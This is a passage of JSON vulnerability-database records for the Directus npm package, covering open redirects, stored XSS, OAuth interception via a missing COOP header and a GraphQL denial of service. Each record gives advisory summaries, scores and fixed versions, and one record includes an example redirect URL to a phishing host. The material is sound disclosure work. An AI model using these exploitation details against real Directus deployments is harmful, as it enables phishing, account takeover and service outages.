ities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerabi
lity":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1"}],"aliases":["GHSA-q83v-hq3j-4pq3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ua8h-tmak-hufd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/83730?format=json","vulnerability_id":"VCID-ufth-uy5w-87fe","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.14.0, an open redirect vulnerability exists in the Directus SAML authentication callback endpoint. During SAML authentication, the `RelayState` parameter is intended to preserve the user's original destination. 
However, while the login initiation flow validates redirect targets against allowed domains, this validation is not applied to the callback endpoint. This allows an attacker to craft a malicious authentication request that redirects users to an arbitrary external URL upon completion. The vulnerability is present in both the success and error handling paths of the callback. This vulnerability can be exploited without authentication. Version 11.14.0 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032","reference_id":"","reference_type":"","scores":[{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14642","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00046","scoring_system":"epss","scoring_elements":"0.14523","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032","reference_id":"CVE-2026-22032","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-22032"},{"reference_url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23","reference_id":"dad9576ea9362905cc4de8028d3877caff36dc23","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Trac
k","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/commit/dad9576ea9362905cc4de8028d3877caff36dc23"},{"reference_url":"https://github.com/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3573-4c68-g8cc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc","reference_id":"GHSA-3573-4c68-g8cc","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-08T14:48:13Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-3573-4c68-g8cc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/36567?format=json","purl":"pkg:npm/directus@11.14.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.14.0"}],"aliases":["CVE-2026-22032","GHSA-3573-4c68-g8cc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vuln
erablecode.io/vulnerabilities/VCID-ufth-uy5w-87fe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/173457?format=json","vulnerability_id":"VCID-uhj5-vc26-t3ga","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.7.0, unauthorized JavaScript (JS) can be executed by inserting an iframe into the rich text html interface that links to an uploaded HTML file that loads another uploaded JS file in its script tag. This satisfies the regular content security policy header, which in turn allows the file to run any arbitrary JS. This issue was resolved in version 9.7.0. As a workaround, disable the live embed in the what-you-see-is-what-you-get by adding `{ \"media_live_embeds\": false }` to the _Options Overrides_ option of the Rich Text HTML interface.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814","reference_id":"","reference_type":"","scores":[{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.63061","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0043","scoring_system":"epss","scoring_elements":"0.62959","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24814"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/pull/12020","reference_id":"12020","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:
54:47Z/"}],"url":"https://github.com/directus/directus/pull/12020"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814","reference_id":"CVE-2022-24814","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24814"},{"reference_url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84","reference_id":"GHSA-xmjj-3c76-5w84","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-xmjj-3c76-5w84"},{"reference_url":"https://github.com/directus/directus/releases/tag/v9.7.0","reference_id":"v9.7.0","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T15:54:47Z/"}],"url":"https://github.com/directus/directus/releases/tag/v9.7.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/20019?format=json","purl":"pkg:npm/directus@9.7.0","is_vulnerable":true,"affected_by_vulnerabilit
ies":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-9t8b-59vc-kbea"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eb1b-zvas-muey"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0"}],"aliases":["CVE-2022-24814","GHSA-xmjj-3c76-5w84"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uhj5-vc26-t3ga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/39920?format=json","vulnerability_id":"VCID-
v2je-s9mk-e3h1","summary":"Directus is a real-time API and App dashboard for managing SQL database content. The authentication API has a `redirect` parameter that can be exploited as an open redirect vulnerability as the user tries to log in via the API URL. There's a redirect that is done after successful login via the Auth API GET request to `directus/auth/login/google?redirect=http://malicious-fishing-site.com`. While credentials don't seem to be passed to the attacker site, the user can be phished into clicking a legitimate directus site and be taken to a malicious site made to look like an error message \"Your password needs to be updated\" to phish out the current password. Users who login via OAuth2 into Directus may be at risk. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239","reference_id":"","reference_type":"","scores":[{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.46037","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0023","scoring_system":"epss","scoring_elements":"0.45892","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-28239"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203","reference_id":"5477d7d61babd7ffc2f835d399bf79611b15b203","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","
scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/commit/5477d7d61babd7ffc2f835d399bf79611b15b203"},{"reference_url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers","reference_id":"authentication.html#login-using-sso-providers","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-03-13T16:10:42Z/"}],"url":"https://docs.directus.io/reference/authentication.html#login-using-sso-providers"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239","reference_id":"CVE-2024-28239","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-28239"},{"reference_url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fr3w-2p22-6w7p"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p","reference_id":"GHSA-fr3w-2p22-6w7p","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-
03-13T16:10:42Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-fr3w-2p22-6w7p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29718?format=json","purl":"pkg:npm/directus@10.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pt9-wpk9-tfhj"},{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0"}],"aliases":["CVE-2024-28239","GHSA-fr3w-2p22-6w7p"],"risk_score":3.1,"exploitability":"0.5","weighted_severity
":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v2je-s9mk-e3h1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90367?format=json","vulnerability_id":"VCID-v6mk-ybv3-tyc8","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A stored cross-site scripting (XSS) vulnerability exists in versions prior to 11.13.0 that allows users with `upload files` and `edit item` permissions to inject malicious JavaScript through the Block Editor interface. Attackers can bypass Content Security Policy (CSP) restrictions by combining file uploads with iframe srcdoc attributes, resulting in persistent XSS execution. Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13895","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.1378","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747","reference_id":"CVE-2025-64747","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64747"},{"reference_url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e","reference_id":"d23525317f0780f04aa1fe7a9
9171a358e43cb2e","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/commit/d23525317f0780f04aa1fe7a99171a358e43cb2e"},{"reference_url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv2v-pw69-8crf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf","reference_id":"GHSA-vv2v-pw69-8crf","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:33:34Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-vv2v-pw69-8crf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9
c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64747","GHSA-vv2v-pw69-8crf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v6mk-ybv3-tyc8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71665?format=json","vulnerability_id":"VCID-v9s1-9n1m-bubs","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus's Single Sign-On (SSO) login pages lacked a Cross-Origin-Opener-Policy (COOP) HTTP response header. Without this header, a malicious cross-origin window that opens the Directus login page retains the ability to access and manipulate the window object of that page. An attacker can exploit this to intercept and redirect the OAuth authorization flow to an attacker-controlled OAuth client, causing the victim to unknowingly grant access to their authentication provider account (e.g. Google, Discord). 
This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00953","published_at":"2026-06-12T12:55:00Z"},{"value":"9e-05","scoring_system":"epss","scoring_elements":"0.00955","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35408"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35408"},{"reference_url":"https://github.com/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8m32-p958-jg99"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99","reference_id":"GHSA-8m32-p958-jg99","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/"}],"url":"https://github.com/directus/directus/se
curity/advisories/GHSA-8m32-p958-jg99"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-35408","GHSA-8m32-p958-jg99"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v9s1-9n1m-bubs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359856?format=json","vulnerability_id":"VCID-y6cy-k9c2-pkcb","summary":"Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. 
This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).","references":[{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh"},{"reference_url":"https://github.com/advisories/GHSA-6q22-g298-grjh","reference_id":"GHSA-6q22-g298-grjh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_